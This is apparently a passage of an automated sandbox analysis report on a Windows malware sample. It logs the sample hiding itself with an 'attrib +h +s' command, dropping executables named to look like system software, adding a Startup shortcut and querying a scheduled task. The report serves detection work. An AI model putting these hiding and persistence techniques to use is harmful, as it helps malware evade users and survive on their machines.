                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                            Source: 3u8A2xjbBT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: 3u8A2xjbBT.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Data Obfuscation

                            barindex
                            .NET source code contains potential unpacker
                            Source: 3u8A2xjbBT.exe, -Module-.cs.Net Code: _206A_200E_206C_206E_202D_206D_200C_202E_200E_206D_202E_200D_202D_200E_206E_200D_206E_206A_200F_206A_200B_200B_202B_206F_202E_200E_202D_200B_202A_206A_206B_206D_200D_200B_202C_206F_200F_206B_202E_200E_202E System.Reflection.Assembly.Load(byte[])
                            Source: windows multimedia platform.exe.0.dr, -Module-.cs.Net Code: _206A_200E_206C_206E_202D_206D_200C_202E_200E_206D_202E_200D_202D_200E_206E_200D_206E_206A_200F_206A_200B_200B_202B_206F_202E_200E_202D_200B_202A_206A_206B_206D_200D_200B_202C_206F_200F_206B_202E_200E_202E System.Reflection.Assembly.Load(byte[])
                            Source: windows nt.exe.0.dr, -Module-.cs.Net Code: _206A_200E_206C_206E_202D_206D_200C_202E_200E_206D_202E_200D_202D_200E_206E_200D_206E_206A_200F_206A_200B_200B_202B_206F_202E_200E_202D_200B_202A_206A_206B_206D_200D_200B_202C_206F_200F_206B_202E_200E_202E System.Reflection.Assembly.Load(byte[])
                            Source: windows photo viewer.exe.0.dr, -Module-.cs.Net Code: _206A_200E_206C_206E_202D_206D_200C_202E_200E_206D_202E_200D_202D_200E_206E_200D_206E_206A_200F_206A_200B_200B_202B_206F_202E_200E_202D_200B_202A_206A_206B_206D_200D_200B_202C_206F_200F_206B_202E_200E_202E System.Reflection.Assembly.Load(byte[])
                            Source: windows portable devices.exe.0.dr, -Module-.cs.Net Code: _206A_200E_206C_206E_202D_206D_200C_202E_200E_206D_202E_200D_202D_200E_206E_200D_206E_206A_200F_206A_200B_200B_202B_206F_202E_200E_202D_200B_202A_206A_206B_206D_200D_200B_202C_206F_200F_206B_202E_200E_202E System.Reflection.Assembly.Load(byte[])
                            Source: windows sidebar.exe.0.dr, -Module-.cs.Net Code: _206A_200E_206C_206E_202D_206D_200C_202E_200E_206D_202E_200D_202D_200E_206E_200D_206E_206A_200F_206A_200B_200B_202B_206F_202E_200E_202D_200B_202A_206A_206B_206D_200D_200B_202C_206F_200F_206B_202E_200E_202E System.Reflection.Assembly.Load(byte[])
                            Source: autoit3.exe.0.dr, -Module-.cs.Net Code: _206A_200E_206C_206E_202D_206D_200C_202E_200E_206D_202E_200D_202D_200E_206E_200D_206E_206A_200F_206A_200B_200B_202B_206F_202E_200E_202D_200B_202A_206A_206B_206D_200D_200B_202C_206F_200F_206B_202E_200E_202E System.Reflection.Assembly.Load(byte[])
                            Source: windowspowershell.exe.0.dr, -Module-.cs.Net Code: _206A_200E_206C_206E_202D_206D_200C_202E_200E_206D_202E_200D_202D_200E_206E_200D_206E_206A_200F_206A_200B_200B_202B_206F_202E_200E_202D_200B_202A_206A_206B_206D_200D_200B_202C_206F_200F_206B_202E_200E_202E System.Reflection.Assembly.Load(byte[])
                            Source: common files.exe.0.dr, -Module-.cs.Net Code: _206A_200E_206C_206E_202D_206D_200C_202E_200E_206D_202E_200D_202D_200E_206E_200D_206E_206A_200F_206A_200B_200B_202B_206F_202E_200E_202D_200B_202A_206A_206B_206D_200D_200B_202C_206F_200F_206B_202E_200E_202E System.Reflection.Assembly.Load(byte[])
                            Source: google.exe.0.dr, -Module-.cs.Net Code: _206A_200E_206C_206E_202D_206D_200C_202E_200E_206D_202E_200D_202D_200E_206E_200D_206E_206A_200F_206A_200B_200B_202B_206F_202E_200E_202D_200B_202A_206A_206B_206D_200D_200B_202C_206F_200F_206B_202E_200E_202E System.Reflection.Assembly.Load(byte[])
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_01662158 pushad ; iretd 0_2_01662159
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0166B1FD push esp; retf 0_2_0166B1D3
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0166B1C5 push esp; retf 0_2_0166B1D3
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0166ABAE push ebx; iretd 0_2_0166ABAF
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_01664453 push ebp; retf 0_2_01664454
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_01660F29 push es; iretd 0_2_01660F2A
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_01660F33 push es; iretd 0_2_01660F34
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 0_2_0BBE6364 pushad ; retf 0_2_0BBE63B9
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A12158 pushad ; iretd 15_2_02A12159
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A10F29 push es; iretd 15_2_02A10F2A
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A10F33 push es; iretd 15_2_02A10F34
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 15_2_02A14453 push ebp; retf 15_2_02A14454
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_01822158 pushad ; iretd 16_2_01822159
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_01824453 push ebp; retf 16_2_01824454
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_01820F29 push es; iretd 16_2_01820F2A
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_01820F33 push es; iretd 16_2_01820F34
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_059AC941 push 9C059093h; ret 16_2_059AC94D
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0A49AB57 push E802005Eh; retf 16_2_0A49AB61
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0A49C954 push 850FD83Bh; ret 16_2_0A49C959
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0A490FFA push 7000005Eh; ret 16_2_0A491001
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0A4910A2 push 1800005Eh; retf 16_2_0A4910B1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 16_2_0A4910B2 push esp; iretd 16_2_0A491101

                            Persistence and Installation Behavior

                            barindex
                            Uses attrib.exe to hide files
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Uses cmd line tools excessively to alter registry or file data
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exeJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: attrib.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\microsoft office.exeJump to dropped file
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\windows multimedia platform.exeJump to dropped file
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\windows nt.exeJump to dropped file
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\mozilla maintenance service.exeJump to dropped file
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\windows mail.exeJump to dropped file
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exeJump to dropped file
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\windows sidebar.exeJump to dropped file
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\windows media player.exeJump to dropped file
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\autoit3.exeJump to dropped file
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\windowspowershell.exeJump to dropped file
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\common files.exeJump to dropped file
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\google.exeJump to dropped file
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\java.exeJump to dropped file
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\internet explorer.exeJump to dropped file
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\msecache.exeJump to dropped file
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\reference assemblies.exeJump to dropped file
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\windows photo viewer.exeJump to dropped file
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\microsoft.net.exeJump to dropped file
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\microsoft.exeJump to dropped file
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\windows defender.exeJump to dropped file
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\jdownloader.exeJump to dropped file
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\windows portable devices.exeJump to dropped file
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\OneDrive\msbuild.exeJump to dropped file

                            Boot Survival

                            barindex
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "3u8A2xjbBT"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3u8A2xjbBT.lnkJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3u8A2xjbBT.lnkJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
